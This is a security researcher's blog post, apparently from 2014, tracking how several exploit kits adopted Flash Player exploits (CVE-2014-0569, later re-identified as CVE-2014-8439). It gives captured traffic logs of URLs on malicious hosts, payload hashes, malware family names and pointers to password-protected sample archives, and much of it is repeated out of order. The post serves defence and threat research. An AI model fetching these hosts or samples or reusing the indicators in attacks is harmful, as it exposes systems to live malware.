2014-10-21
CVE-2014-0569 (Flash Player) integrating Exploit Kit
 |
<this post has been edited multiple time to fix some error, bring some new elements. may still be changed >
My goal was to grab CVE-2014-0556 when i landed yesterday on Fiesta but according to @TimoHirvonen it's CVE-2014-0569 fixed only 1 week ago that has been fired here. It's a really fast integration in Exploit Kit. I've been told it landed in Fiesta after its coder reversed the patch (in 2 days).
So you know what to do : Ensure Flash Player is up to date (15.0.0.189 - for IE10/IE11 user the patch to check is : KB3001237 )
Fiesta :
 |
| CVE-2014-0569 successfull pass in Fiesta EK 2014-10-21 Fiesta Logo Courtesy of FoxIT. |
GET http://rvdcgyisqy.myftp .org/jjcv7antdqqollz6mqusrbwjcu3z1835zzuurupwvyxdsy
200 OK (text/html)
"Relevant section from Fiesta landing page : http://pastebin.com/K4gbQWpS" By Jason in comments
GET http://rvdcgyisqy.myftp .org/cp9ne2q/4f25f1a50659fee801500b0e540a50040053040e5253510e0152060357535850;150000;144
200 OK (application/x-shockwave-flash) 254690dd89055c46f1a60713dbc26965 CVE-2014-0569
200 OK (application/x-shockwave-flash) 254690dd89055c46f1a60713dbc26965 CVE-2014-0569
GET http://rvdcgyisqy.myftp .org/cp9ne2q/55cd3f2a4a3ae27c5645085f015d03500100555f0704025a0001575202040b04;7
200 OK (application/octet-stream) 2b74a966466d612b069161b4fdd0f775 Payload : Ropest (thx @Horgh_rce )
GET http://rvdcgyisqy.myftp
.org/cp9ne2q/55cd3f2a4a3ae27c5645085f015d03500100555f0704025a0001575202040b04;7;1
200 OK (text/html)
[Edit 2014-11-25 : So the CVE here is in fact CVE-2014-8439 See post by F-Secure ]
GET http://three.creziontyro .in/qsx0jugfgk
200 OK (text/html) After first pass of deobfuscation http://pastebin.com/tnRKArFz (thx as always to @EKWatcher ) Update coming later maybe.
GET http://three.creziontyro .in/J-XQctybYriag-bOGIcSDh-HchIdpmXKk_M52H6bO6Y7NsJMsSIWWvNTG-R0tdBR
200 OK (application/x-shockwave-flash) d54a6cca8b6b52f6ed47769ba6397444 CVE-2014-xxxx
GET http://three.creziontyro .in/KxYioLx6A_QJguVdGPUpkrc6lJWbIWICBCyS8LR7X3pDLnTugBkW7GVC1vXjAtFj
200 OK (application/octet-stream) Stream containing Shellcode and Bedep.
Target Payload : 831098a9d8db43bebf3d6ee67914888d Kins Variant (Thanks to @maciekkotowicz who wrote about it on Kernelmode)
[Edit 2014-11-25 : The CVE here is in fact CVE-2014-8439 See post by F-Secure ]
(Once again...Sorry I do not have enough time yet to study this in details)
GET http://b.kok44 .com/qtzscn6d2vyrp.html
200 OK (text/html)
POST http://b.kok44 .com/nlPPOoTJIWP0MPcC66tPW6E881Kxrk4JpG3zUe7-T16vY_BTuvYfUu118wO64AEI8g..
404 Not Found (text/html)
GET http://b.kok44 .com/qtzscn6d2vyrp.html
200 OK (text/html)
POST http://b.kok44 .com/YYclWjoL_Ppe6BRhUmbCkQ7uSWFZaMeRW-0UZ1I9lZYMvEtmAjeXkRKhGWMEItyRDQ..
200 OK (text/html)
GET http://b.kok44 .com/iajJ15EwZW62x_js-V1bBebBpezyU14Fs8L46vkGDALkk6frqQwOBfqO9eysGUUF5Q..
200 OK (application/x-shockwave-flash) 99a8b37fcd995f859e2b7e22ce8fe72b CVE-2014-05xx ??
GET http://b.kok44 .com/pYU3o8dIJ8ma6gaYryUZosrsW5ikKxyin-8Gnq9-TqXIvlmf_3RMotajC5j1YQeiyQ.. After deobfuscation ; 3ef89107362630d2ad56e7bef5a717fc Miuref AdFraud (cf form. Partnerka.me)
200 OK (application/octet-stream)
A pass with Firefox and flash 15.0.0.152 seems to confirm that. CVE-2014-0569 confirmed by Kaspersky. Simon Choi told me he also got a successful pass with IE 11 / flash 15.0.0.167 on Windows 8.
GET http://pirat.svanager.wielun .pl:8080/elements/film.php?london=274412&desktop=209908&advocacy=17&bloggers=22666&free=56481&articles=178642&other=287691
200 OK (text/html)
GET http://pirat.svanager.wielun .pl:8080/elements/xrbolXSHx
200 OK (application/x-shockwave-flash) 6d5591ef4d3ddb1c0b47d52a58e36036
GET http://pirat.svanager.wielun.pl:8080/backup.php?lang=1341&topics=12&voip=505&myguest=1251&math=1377&down=2386&game=2511
200 OK (application/octet-stream) Kovter bc8e0c39cc66da9c2caee65bd3a70882
Files: Soon. After Nuclear Pack integration.
GET http://tinsinarbetrab .eu/xs3884y132186/index.php
200 OK (text/html)
GET http://tinsinarbetrab .eu/xs3884y132186/js/swfobject.js
200 OK (application/javascript)
GET http://tinsinarbetrab .eu/xs3884y132186/banner.swf
200 OK (application/x-shockwave-flash) Filtering advert 8124c71afe59779e181c52857f990103
POST http://tinsinarbetrab .eu/xs3884y132186/gate.php
200 OK (text/html)
GET http://tinsinarbetrab .eu/xs3884y132186/Main.swf
200 OK (application/x-shockwave-flash) 93bd68ff7112244d19030d360e9b2108 CVE-2014-0569 identified by Timo Hirvonen
GET http://tinsinarbetrab .eu/xs3884y132186/lofla1.php
200 OK (application/octet-stream) Necurs 96f0f62f798987fb0dd3427182775ef7
Files: Soon.
RIG :
GET http://blog.dwightdavisarchitect .net/?PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg|YTUyZTE1NjA3NGM0NGQzNmJiMTg4ZDZkNjVmMWE2YTA
200 OK (text/html)
GET http://blog.dwightdavisarchitect .net/index.php?req=swf&num=174&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg|YTUyZTE1NjA3NGM0NGQzNmJiMTg4ZDZkNjVmMWE2YTA
200 OK (application/x-shockwave-flash) 28edb6d99e80823b22b28c7d6fb5106999d7df4365d547c64b7dfd4973cb95a0 CVE-2014-0569. Confirmation by Kaspersky Lab.
GET http://blog.dwightdavisarchitect .net/index.php?req=mp3&num=72237&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7CYTUyZTE1NjA3NGM0NGQzNmJiMTg4ZDZkNjVmMWE2YTA
200 OK (application/x-msdownload) <- Glupteba.
File: RIG_2014-11-06.zip (Owncloud)
Nuclear Pack :
Same exploit as in Astrum according to @TimoHirvonen
[Edit 2014-11-25 : the CVE here is in fact CVE-2014-8439 See post by F-Secure ]
GET http://mienzamicherdoekno .co.vu/61c4895bc2uuv.html
200 OK (text/html)
GET http://mienzamicherdoekno .co.vu/f285e22b4bcac2uuv/1415616660
200 OK (application/octet-stream) - e5dc40303049ecbffabfd47fc4b92809
Despite the debug string, according to Timo and Kaspersky, as in Astrum and Angler EK, it's not CVE-2014-0569
GET http://mienzamicherdoekno .co.vu/f285e22bc2uuv/1415616660/7
200 OK (application/octet-stream) - 275bcc790883204f559852bd9a6e74f4 Kelihos Loader
GET http://mienzamicherdoekno.co.vu/f285e22bc2uuv/1415616660/7/2
200 OK (application/octet-stream) Empty
Files: Nuclear Pack_2014-11-10.zip
Null Hole :
Call me Null Hole maybe?
Archie :
Files : Fiddler&Flash (password is : malware)
Magnitude :
Thanks Timo Hirvonen for CVE identification and Will Metcalf and EKWatcher for allowing that pass.
Sample: f5e3ce7da019cf38dc3982f9f323aee2
Files: Fiddler and Flash : Magnitude_2014-12-03.zip
Post publication Readings :
Cracking the CVE-2014-0569 nutshell - Chun Feng - Microsoft Protection Center - 2014-11-06
200 OK (text/html)
Files : Nothing Yet.
Fiddler sent to VT here : 9bb6292633f4eccd54aeb23ad3555507
Angler EK :
[Edit 2014-10-22 : It appears this could be another CVE (0558 or 0564 or something else killed by the last update) than CVE-2014-0569 - Am asking for help in figuring out][Edit 2014-11-25 : So the CVE here is in fact CVE-2014-8439 See post by F-Secure ]
 |
Followed by Bedep activity and a Zeus Variant Edit 2014-11-25 - CVE-2014-8439 Edt 2014-12-21 - Kaspersky lab named that Zeus Variant : Chthonic |
200 OK (text/html) After first pass of deobfuscation http://pastebin.com/tnRKArFz (thx as always to @EKWatcher ) Update coming later maybe.
GET http://three.creziontyro .in/J-XQctybYriag-bOGIcSDh-HchIdpmXKk_M52H6bO6Y7NsJMsSIWWvNTG-R0tdBR
200 OK (application/x-shockwave-flash) d54a6cca8b6b52f6ed47769ba6397444 CVE-2014-xxxx
200 OK (application/octet-stream) Stream containing Shellcode and Bedep.
Target Payload : 831098a9d8db43bebf3d6ee67914888d Kins Variant (Thanks to @maciekkotowicz who wrote about it on Kernelmode)
Files: Fiddler sent to VT here : 6c0cd2dae5c43f92d86411977bb28b08
Astrum EK:
So Astrum is owning Flash 15.0.0.152. It seems the same undefined CVE (fixed 10 days ago by the last Flash Player patch ) in Angler EK is being used here as well.[Edit 2014-11-25 : The CVE here is in fact CVE-2014-8439 See post by F-Secure ]
 |
| Astrum EK exploiting Flash 15.0.0.152 to push Miuref AdFraud 2014-10-24 Edit 2014-11-25 - CVE-2014-8439 |
(Once again...Sorry I do not have enough time yet to study this in details)
GET http://b.kok44 .com/qtzscn6d2vyrp.html
200 OK (text/html)
POST http://b.kok44 .com/nlPPOoTJIWP0MPcC66tPW6E881Kxrk4JpG3zUe7-T16vY_BTuvYfUu118wO64AEI8g..
404 Not Found (text/html)
GET http://b.kok44 .com/qtzscn6d2vyrp.html
200 OK (text/html)
POST http://b.kok44 .com/YYclWjoL_Ppe6BRhUmbCkQ7uSWFZaMeRW-0UZ1I9lZYMvEtmAjeXkRKhGWMEItyRDQ..
200 OK (text/html)
GET http://b.kok44 .com/iajJ15EwZW62x_js-V1bBebBpezyU14Fs8L46vkGDALkk6frqQwOBfqO9eysGUUF5Q..
200 OK (application/x-shockwave-flash) 99a8b37fcd995f859e2b7e22ce8fe72b CVE-2014-05xx ??
GET http://b.kok44 .com/pYU3o8dIJ8ma6gaYryUZosrsW5ikKxyin-8Gnq9-TqXIvlmf_3RMotajC5j1YQeiyQ.. After deobfuscation ; 3ef89107362630d2ad56e7bef5a717fc Miuref AdFraud (cf form. Partnerka.me)
200 OK (application/octet-stream)
Files: Nothing Yet.
Fiddler sent to VT here : 5e9abc8ef40bb98afb00e40f12958919
Sweet Orange :
@kafeine Sweet Orange EK also uses the CVE-2014-0569.
— Simon Choi (@issuemakerslab) October 28, 2014A pass with Firefox and flash 15.0.0.152 seems to confirm that. CVE-2014-0569 confirmed by Kaspersky. Simon Choi told me he also got a successful pass with IE 11 / flash 15.0.0.167 on Windows 8.
GET http://pirat.svanager.wielun .pl:8080/elements/film.php?london=274412&desktop=209908&advocacy=17&bloggers=22666&free=56481&articles=178642&other=287691
200 OK (text/html)
GET http://pirat.svanager.wielun .pl:8080/elements/xrbolXSHx
200 OK (application/x-shockwave-flash) 6d5591ef4d3ddb1c0b47d52a58e36036
GET http://pirat.svanager.wielun.pl:8080/backup.php?lang=1341&topics=12&voip=505&myguest=1251&math=1377&down=2386&game=2511
200 OK (application/octet-stream) Kovter bc8e0c39cc66da9c2caee65bd3a70882
Files: Soon. After Nuclear Pack integration.
Flash EK :
 |
| CVE-2014-0569 fired by a "full" Flash EK on 2014-10-28 |
200 OK (text/html)
GET http://tinsinarbetrab .eu/xs3884y132186/js/swfobject.js
200 OK (application/javascript)
GET http://tinsinarbetrab .eu/xs3884y132186/banner.swf
200 OK (application/x-shockwave-flash) Filtering advert 8124c71afe59779e181c52857f990103
POST http://tinsinarbetrab .eu/xs3884y132186/gate.php
200 OK (text/html)
GET http://tinsinarbetrab .eu/xs3884y132186/Main.swf
200 OK (application/x-shockwave-flash) 93bd68ff7112244d19030d360e9b2108 CVE-2014-0569 identified by Timo Hirvonen
GET http://tinsinarbetrab .eu/xs3884y132186/lofla1.php
200 OK (application/octet-stream) Necurs 96f0f62f798987fb0dd3427182775ef7
RIG :
 |
| Successfull pass in RIG for CVE-2014-0569 2014-11-06 (inside since : 2014-11-04) |
200 OK (text/html)
GET http://blog.dwightdavisarchitect .net/index.php?req=swf&num=174&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg|YTUyZTE1NjA3NGM0NGQzNmJiMTg4ZDZkNjVmMWE2YTA
200 OK (application/x-shockwave-flash) 28edb6d99e80823b22b28c7d6fb5106999d7df4365d547c64b7dfd4973cb95a0 CVE-2014-0569. Confirmation by Kaspersky Lab.
GET http://blog.dwightdavisarchitect .net/index.php?req=mp3&num=72237&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7CYTUyZTE1NjA3NGM0NGQzNmJiMTg4ZDZkNjVmMWE2YTA
200 OK (application/x-msdownload) <- Glupteba.
File: RIG_2014-11-06.zip (Owncloud)
Nuclear Pack :
Same exploit as in Astrum according to @TimoHirvonen
[Edit 2014-11-25 : the CVE here is in fact CVE-2014-8439 See post by F-Secure ]
 |
| Nuclear Pack exploiting Flash 15.0.0.152 to push Kelihos Loader Edit 2014-11-25 - CVE-2014-8439 |
200 OK (text/html)
 |
| Piece of code to filter flash version on decoded landing http://pastebin.com/BFxrTZiF |
200 OK (application/octet-stream) - e5dc40303049ecbffabfd47fc4b92809
GET http://mienzamicherdoekno .co.vu/f285e22bc2uuv/1415616660/7
200 OK (application/octet-stream) - 275bcc790883204f559852bd9a6e74f4 Kelihos Loader
GET http://mienzamicherdoekno.co.vu/f285e22bc2uuv/1415616660/7/2
200 OK (application/octet-stream) Empty
Files: Nuclear Pack_2014-11-10.zip
Null Hole :
Call me Null Hole maybe?
Archie :
CVE- identification by Anton Ivanov ( Kaspersky ) (Thanks)  |
| CVE-2014-0569 fired by Archie 2014-11-18 |
Magnitude :
Thanks Timo Hirvonen for CVE identification and Will Metcalf and EKWatcher for allowing that pass.
 |
| Magnitude successfully firing CVE-2014-8439 ("downgraded") against flash 15.0.0.152 2014-12-03 |
Files: Fiddler and Flash : Magnitude_2014-12-03.zip
Post publication Readings :
Cracking the CVE-2014-0569 nutshell - Chun Feng - Microsoft Protection Center - 2014-11-06